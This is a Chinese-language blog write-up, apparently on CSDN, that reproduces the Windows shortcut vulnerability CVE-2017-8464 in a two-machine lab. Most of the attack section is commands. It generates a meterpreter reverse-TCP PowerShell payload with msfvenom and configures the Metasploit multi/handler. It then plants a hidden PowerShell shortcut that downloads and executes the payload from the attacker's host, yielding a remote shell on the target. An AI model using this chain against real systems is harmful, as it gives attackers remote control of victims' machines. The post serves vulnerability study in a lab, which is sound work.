ubuntu自动获取ip地址的命令_CVE-2017-8464远程命令执行漏洞复现

7056992fae9bbe5d64c541cc5ef0144d.png

闲来没事翻翻漏洞复现的进程,哎。。。这个漏洞复现还是做了吧,当作自己的笔记与大家分享一下,其实网上有许多这样的文章,本小白只是打着学习漏洞原理来进行漏洞复现。

CVE-2017-8464的漏洞:官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。这个漏洞影响的版本其实挺多的。

可以远程利用的漏洞版本:

  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 version 1511 for 32-bit Systems
  • Microsoft Windows 10 version 1511 for x64-based Systems
  • Microsoft Windows 10 version 1703 for 32-bit Systems
  • Microsoft Windows 10 version 1703 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows RT 8.1

服务器系统

  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016

实验环境:

攻击机:Ubuntu

IP地址:192.168.205.138

靶机: Microsoft Windows Server 2008

IP地址:192.168.205.135

注明一下:本打算使用kali2.0作为攻击机,由于出了点小状况,故使用乌班图虚机作为攻击机。

话不多说,拿起工具开始干:

首先,我们现在乌班图虚机中创建一个shell,名称为cmdback.ps1:

执行命令msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.205.138 lport=6666 -f psh-reflection>cmdback.ps1,在网站目录下生成了一个cmdback.ps1的文件:

3fead599b859841afeb5b099bd63ce87.png

访问乌班图中生成的shell文件:

b5eafb60592902b04fb5cc0702b370be.png

启动msf进行设置反弹参数信息:

(1)、输入命令进入 use exploit/multi/handler

指定本机IP set LHOST 192.168.205.138

指定端口 set LPORT 6666

设置返回载荷 set payload windows/x64/meterpreter/reverse_tcp

5e519e33cb5d2eab891206061c9c4730.png

上述工作做完之后,在靶机上面创建posershell.exe的快捷键:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.205.138/cmdback.ps1');test.ps1"

e242fe404412954040c4d5fdd6b95fea.png

点击下一步,生成的*.exe文件:

8b6dce0f4cd973fe5811df68c3e401fd.png

93d574135c0316b6e17106a64d1fa8af.png
生成的快捷键

最后我们在攻击机上面输入exploit ,同时在靶机上面运行powershell.exe快捷键:

138d79397a50dd2cc96d406b08da5e93.png
已经获取到靶机的shell

输入shell,成功获取目标主机的权限:

e7c31f6cb93ff00b42ff06aaba88dfb2.png
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值